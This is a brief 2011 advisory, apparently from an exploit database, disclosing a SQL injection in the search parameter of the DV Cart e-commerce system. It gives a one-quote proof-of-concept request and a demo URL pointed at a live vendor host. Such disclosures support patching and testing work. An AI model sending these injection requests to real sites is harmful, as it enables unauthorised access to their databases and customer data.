DV Cart (E-Commerce System) suffers from a remote SQL injection vulnerability.
4249ce7ee1e9b6288732813fc4af10aa27f355a667582933d00042691e17a9c4
# Exploit Title: DV Cart (E-Commerce System) SQL Injection
# Date: 19.08.2011
# Author: Eyup CELIK
# Software Link: http://www.esmistudio.com
# Version: All Version
# Tested on: All versions are Vulnerability
ISSUE
SQL Injection can be done using the command input
Example
index.php?keyword=<SQL Injection Code>&mod=search&submit=GO
Exploit:
index.php?keyword='1&mod=search&submit=GO
Demo:
http://www.esmistudio.com/dv10dis/index.php?keyword=%271&mod=search&submit=GO
Thanks,
Eyup CELIK
Bilgi Teknolojileri Güvenlik Uzmani
http://www.eyupcelik.com.tr